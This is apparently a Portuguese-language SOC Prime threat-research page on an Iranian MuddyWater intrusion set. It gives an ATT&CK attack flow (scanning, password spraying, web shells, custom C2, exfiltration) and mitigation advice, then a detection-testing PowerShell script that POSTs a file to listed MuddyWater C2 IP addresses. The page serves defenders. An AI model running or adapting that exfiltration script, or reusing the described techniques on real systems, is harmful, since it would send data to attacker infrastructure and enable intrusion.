SOC Prime Bias: Crítico

06 Apr 2026 16:42 UTC

MuddyWater Revelado: Dentro de uma operação APT iraniana

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
MuddyWater Revelado: Dentro de uma operação APT iraniana
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Pesquisadores identificaram um conjunto de intrusão MuddyWater (Static Kitten) que combinou múltiplos frameworks C2 personalizados com exploração oportunista de diversas falhas expostas na internet e pulverização de credenciais em alta escala. Os operadores encadearam ferramentas de reconhecimento, acesso inicial, e roubo de dados para comprometer alvos no Oriente Médio, Europa e Estados Unidos.

Investigação

Investigadores apreenderam infraestrutura exposta de um VPS hospedado na Holanda e extraíram binários para três servidores C2 construídos para propósito específico: KeyC2, PersianC2, e ArenaC2. Eles também recuperaram ferramentas de suporte, incluindo carregadores baseados em PowerShell e payloads Node.js usados para staging e execução. A atividade apresentou escaneamento amplo para CVEs expostos publicamente seguido de exploração, e incorporou contratos inteligentes de blockchain como um mecanismo para resolver ou atualizar endpoints C2 dinamicamente.

Mitigação

Priorize a remediação dos CVEs referenciados e reduza a superfície de ataque fortalecendo e limitando a exposição de serviços acessíveis publicamente. Bloqueie ou restrinja severamente o tráfego UDP desconhecido de saída na porta 1269 e monitore artefatos de execução ligados aos binários C2 personalizados e seus padrões de comando distintos. Implemente o princípio do menor privilégio para contas de VPN e administrativas em dispositivos de rede, e aumente a cobertura de detecção para comportamento anômalo de PowerShell e sessões de saída criptografadas para IPs desconhecidos.

Resposta

Se indicadores forem observados, isole sistemas impactados, preserve artefatos de memória e disco, e bloqueie imediatamente os domínios/IPs C2 identificados. Realize triagem forense de carregadores recuperados e scripts Node.js para delimitar execução e persistência. Corrija todas as vulnerabilidades exploradas e gire quaisquer credenciais que possam ter sido expostas através de pulverização ou roubo.

<div class="wp-block-socprime-category-attack-flow attack-flow-class" data-title="Attack Flow" data-attack-flow="graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ccffcc classDef c2 fill:#ffccff %% Step 1 – Active Scanning: Vulnerability Scanning step1["<b>Action</b> – <b>T1595.002 Active Scanning: Vulnerability Scanning</b><br/>Tool: Nuclei<br/>Description: Mass‑scan public services for exploitable CVEs such as FortiOS CVE‑2024‑55591 and Ivanti CVE‑2026‑1281."] class step1 action tool_nuclei["<b>Tool</b> – <b>Name</b>: Nuclei<br/><b>Description</b>: High‑speed vulnerability scanner used for large‑scale internet probing."] class tool_nuclei tool step1 –>|uses| tool_nuclei step1 –>|leads_to| step2 %% Step 2 – Gather Victim Network Information: DNS step2["<b>Action</b> – <b>T1590.002 Gather Victim Network Information: DNS</b><br/>Tools: subfinder, Sudomy, OneForAll<br/>Description: Enumerate subdomains and DNS records for targets such as clearview.ai and jewishagency.org."] class step2 action tool_subfinder["<b>Tool</b> – <b>Name</b>: subfinder<br/><b>Description</b>: Fast passive subdomain discovery tool."] class tool_subfinder tool step2 –>|uses| tool_subfinder step2 –>|leads_to| step3 %% Step 3 – Active Scanning: Wordlist Scanning step3["<b>Action</b> – <b>T1595.003 Active Scanning: Wordlist Scanning</b><br/>Tool: ffuf<br/>Description: Brute‑force web directories with a medium‑size wordlist to discover hidden resources."] class step3 action tool_ffuf["<b>Tool</b> – <b>Name</b>: ffuf<br/><b>Description</b>: Fast web‑fuzzer for directory and file discovery."] class tool_ffuf tool step3 –>|uses| tool_ffuf step3 –>|leads_to| step4 %% Step 4 – Search Open Technical Databases: Scan Databases step4["<b>Action</b> – <b>T1596.005 Search Open Technical Databases: Scan Databases</b><br/>Tool: Shodan CLI<br/>Description: Query Shodan for vulnerable Ivanti devices using service signatures and favicon hashes."] class step4 action tool_shodan["<b>Tool</b> – <b>Name</b>: Shodan CLI<br/><b>Description</b>: Command‑line interface to the Shodan internet‑exposure search engine."] class tool_shodan tool step4 –>|uses| tool_shodan step4 –>|leads_to| step5 %% Step 5 – Brute Force: Password Spraying step5["<b>Action</b> – <b>T1110.003 Brute Force: Password Spraying</b><br/>Tool: Python owa.py script<br/>Description: Spray common passwords against Outlook Web Access and SMTP services of Israeli, Jordanian and UAE organisations."] class step5 action tool_owa["<b>Tool</b> – <b>Name</b>: owa.py<br/><b>Description</b>: Python script that performs password‑spraying attacks against OWA endpoints."] class tool_owa tool step5 –>|uses| tool_owa step5 –>|leads_to| step6 %% Step 6 – Brute Force: Password Guessing step6["<b>Action</b> – <b>T1110.001 Brute Force: Password Guessing</b><br/>Tool: Patator<br/>Description: Attempt SMTP logins with credential lists to obtain valid accounts."] class step6 action tool_patator["<b>Tool</b> – <b>Name</b>: Patator<br/><b>Description</b>: Multi‑protocol brute‑forcing tool supporting SMTP, SSH, HTTP, etc."] class tool_patator tool step6 –>|uses| tool_patator step6 –>|leads_to| step7 %% Step 7 – Exploit Public‑Facing Application step7["<b>Action</b> – <b>T1190 Exploit Public‑Facing Application</b><br/>Technique: Novel SQL injection flaws in BaSalam and a Postgres development platform.<br/>Description: Exploit crafted SQLi payloads to obtain initial foothold on web servers."] class step7 action step7 –>|leads_to| step8 %% Step 8 – Exploitation of Remote Services step8["<b>Action</b> – <b>T1210 Exploitation of Remote Services</b><br/>Tool: Neo‑reGeorg ASPX web‑shell<br/>Description: Upload web‑shell to compromised Exchange server for persistence and remote command execution."] class step8 action malware_neoregeorg["<b>Malware</b> – <b>Name</b>: Neo‑reGeorg ASPX web‑shell<br/><b>Description</b>: ASPX web‑shell providing remote command execution and tunneling capabilities."] class malware_neoregeorg malware step8 –>|uploads| malware_neoregeorg step8 –>|leads_to| step9 %% Step 9 – Boot or Logon Autostart Execution: Registry Run Keys step9["<b>Action</b> – <b>T1547.001 Boot or Logon Autostart Execution: Registry Run Keys</b><br/>Malware: Node.js payload VfZUSQi6oerKau.js<br/>Description: Create HKCU\Software\Microsoft\Windows\CurrentVersion\Run key for persistence."] class step9 action malware_nodejs["<b>Malware</b> – <b>Name</b>: VfZUSQi6oerKau.js<br/><b>Description</b>: Obfuscated Node.js payload that writes a Run‑key for persistence."] class malware_nodejs malware step9 –>|creates| malware_nodejs step9 –>|leads_to| step10 %% Step 10 – Server Software Component: Web Shell step10["<b>Action</b> – <b>T1505.003 Server Software Component: Web Shell</b><br/>Component: Neo‑reGeorg web‑shell (nfud.aspx)<br/>Description: Enables remote command execution on compromised server."] class step10 action malware_nfud["<b>Malware</b> – <b>Name</b>: nfud.aspx<br/><b>Description</b>: ASPX web‑shell variant used for persistent access."] class malware_nfud malware step10 –>|implements| malware_nfud step10 –>|leads_to| step11 %% Step 11 – Create Account: Local Account step11["<b>Action</b> – <b>T1136.001 Create Account: Local Account</b><br/>Result: Privileged admin account "FortiSetup" with super_admin profile.<br/>Description: Modified FortiGate exploit scripts to add a persistent local admin account."] class step11 action step11 –>|leads_to| step12 %% Step 12 – Obfuscated Files or Information step12["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/>Malware: Node.js payloads<br/>Description: Payloads heavily obfuscated and AES‑CBC encrypted before being written to disk."] class step12 action malware_obf["<b>Malware</b> – <b>Name</b>: Encrypted Node.js payloads<br/><b>Description</b>: AES‑CBC encrypted blobs stored on the victim file system."] class malware_obf malware step12 –>|produces| malware_obf step12 –>|leads_to| step13 %% Step 13 – Deobfuscate/Decode Files or Information step13["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/>Tool: PowerShell loader reset.ps1<br/>Description: Decrypts AES‑CBC encrypted blobs at runtime."] class step13 action tool_psloader["<b>Tool</b> – <b>Name</b>: reset.ps1<br/><b>Description</b>: PowerShell script that decrypts and loads malicious payloads in memory."] class tool_psloader tool step13 –>|uses| tool_psloader step13 –>|leads_to| step14 %% Step 14 – Reflective Code Loading step14["<b>Action</b> – <b>T1620 Reflective Code Loading</b><br/>Technique: PowerShell loader loads decrypted Node.js components reflectively in memory."] class step14 action step14 –>|leads_to| step15 %% Step 15 – Application Layer Protocol: Web Protocols step15["<b>Action</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/>C2: PersianC2<br/>Description: HTTP polling using JSON API endpoints to retrieve commands."] class step15 action c2_persian["<b>C2</b> – <b>Name</b>: PersianC2<br/><b>Description</b>: HTTP‑based command and control using JSON polling."] class c2_persian c2 step15 –>|communicates_via| c2_persian step15 –>|leads_to| step16 %% Step 16 – Non‑Application Layer Protocol step16["<b>Action</b> – <b>T1095 Non‑Application Layer Protocol</b><br/>C2: KeyC2<br/>Description: Custom binary protocol over UDP port 1269 for beaconing and command execution."] class step16 action c2_key["<b>C2</b> – <b>Name</b>: KeyC2<br/><b>Description</b>: UDP‑based covert channel using proprietary binary format."] class c2_key c2 step16 –>|communicates_via| c2_key step16 –>|leads_to| step17 %% Step 17 – Web Service: Dead Drop Resolver step17["<b>Action</b> – <b>T1102.001 Web Service: Dead Drop Resolver</b><br/>Technique: Query Ethereum smart contracts to resolve C2 server IP addresses dynamically."] class step17 action step17 –>|leads_to| step18 %% Step 18 – Web Service: Bidirectional Communication step18["<b>Action</b> – <b>T1102.002 Web Service: Bidirectional Communication</b><br/>C2: ArenaC2 (FastAPI/uvicorn)<br/>Description: HTTP POST interface encrypting traffic with AES‑256‑CBC."] class step18 action c2_arena["<b>C2</b> – <b>Name</b>: ArenaC2<br/><b>Description</b>: FastAPI server providing encrypted bidirectional C2 channel."] class c2_arena c2 step18 –>|uses| c2_arena step18 –>|leads_to| step19 %% Step 19 – Web Service: One‑Way Communication step19["<b>Action</b> – <b>T1102.003 Web Service: One‑Way Communication</b><br/>Component: Minimal Flask server (web.py) on port 10443 accepting file uploads for exfiltration."] class step19 action malware_flask["<b>Malware</b> – <b>Name</b>: web.py<br/><b>Description</b>: Simple Flask app acting as a dead‑drop for stolen data."] class malware_flask malware step19 –>|implements| malware_flask step19 –>|leads_to| step20 %% Step 20 – Protocol Tunneling step20["<b>Action</b> – <b>T1572 Protocol Tunneling</b><br/>Tool: Neo‑reGeorg acting as SOCKS proxy (resocks, revsocks) to tunnel into internal networks."] class step20 action step20 –>|leads_to| step21 %% Step 21 – Proxy: External Proxy step21["<b>Action</b> – <b>T1090.002 Proxy: External Proxy</b><br/>Listeners: resocks and revsocks creating external SOCKS proxies for lateral movement."] class step21 action step21 –>|leads_to| step22 %% Step 22 – Encrypted Channel: Symmetric Cryptography step22["<b>Action</b> – <b>T1573.001 Encrypted Channel: Symmetric Cryptography</b><br/>Technique: ArenaC2 encrypts all C2 traffic with AES‑256‑CBC using a hard‑coded key."] class step22 action step22 –>|leads_to| step23 %% Step 23 – Dynamic Resolution step23["<b>Action</b> – <b>T1568 Dynamic Resolution</b><br/>Method: Smart‑contract calls (getString) on Ethereum return active C2 IP list (e.g., 185.236.25.119)."] class step23 action step23 –>|leads_to| step24 %% Step 24 – Exfiltration to Cloud Storage step24["<b>Action</b> – <b>T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage</b><br/>Tool: rclone<br/>Destination: Wasabi S3, put.io<br/>Description: Upload stolen files to cloud storage accounts."] class step24 action tool_rclone["<b>Tool</b> – <b>Name</b>: rclone<br/><b>Description</b>: Command‑line program for syncing files to cloud storage services."] class tool_rclone tool step24 –>|uses| tool_rclone step24 –>|leads_to| step25 %% Step 25 – Exfiltration Over C2 Channel step25["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/>Capability: KeyC2 and PersianC2 support file download commands to retrieve data from victims."] class step25 action step25 –>|leads_to| step26 %% Step 26 – Exfiltration Over Alternative Protocol step26["<b>Action</b> – <b>T1048 Exfiltration Over Alternative Protocol</b>

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O teste inicial de Telemetria e Base deve ter sido aprovado.

Justificativa: Esta seção detalha a execução precisa da técnica de adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e têm como objetivo gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa & Comandos de Ataque:

    1. Reconhecimento & Preparação de Dados: O atacante enumera arquivos locais (T1005) e escreve um pequeno payload (secret.txt) na estação de trabalho.
    2. Configuração de Comunicação C2: Usando PowerShell (T1059.001), o atacante cria um POST HTTPS para o servidor C2 MuddyWater 194.11.246.101 na porta 443, incorporando os dados preparados.
    3. Canal Alternativo (Porta Não-Padrão): Para evadir regras simples baseadas em porta, o atacante repete a exfiltração pela porta 1338 usando Invoke-WebRequest com o comando -Port (PowerShell 7+).
    4. Encadeamento de Proxy Opcional: A solicitação é roteada através de um proxy externo (T1090.002) mas o IP de destino final continua sendo o host MuddyWater, garantindo que os logs do firewall mantenham o dst_ip.
  • Script de Teste de Regressão:

    # Simulação de Exfiltração MuddyWater – PowerShell
    # ------------------------------------------------
    # Passo 1: Criar dados fictícios
    $dataPath = "$env:TEMPsecret.txt"
    "Dados Sensíveis $(Get-Date)" | Out-File -FilePath $dataPath -Encoding UTF8
    
    # Passo 2: Definir endpoints C2
    $c2Ips = @('194.11.246.101','18.223.24.218')
    $c2Ports = @(443,1338)
    
    # Passo 3: Upload via HTTPS (porta 443)
    foreach ($ip in $c2Ips) {
        $uri = "https://$ip/upload"
        Invoke-WebRequest -Uri $uri -Method POST -InFile $dataPath -UseBasicParsing -ErrorAction SilentlyContinue
    }
    
    # Passo 4: Upload via porta personalizada 1338 (requer PowerShell 7+)
    foreach ($ip in $c2Ips) {
        $uri = "http://$ip:1338/upload"
        Invoke-WebRequest -Uri $uri -Method POST -InFile $dataPath -UseBasicParsing -ErrorAction SilentlyContinue
    }
    
    # Passo 5: Limpar
    Remove-Item -Path $dataPath -Force
  • Comandos de Limpeza:

    # Remova quaisquer conexões de rede remanescentes (Windows)
    Get-NetTCPConnection -RemoteAddress 194.11.246.101,18.223.24.218 |
        Where-Object { $_.State -eq 'Established' } |
        ForEach-Object { Stop-Process -Id $_.OwningProcess -Force }
    
    # Excluir arquivos temporários (execute novamente se necessário)
    $tempFile = "$env:TEMPsecret.txt"
    if (Test-Path $tempFile) { Remove-Item $tempFile -Force }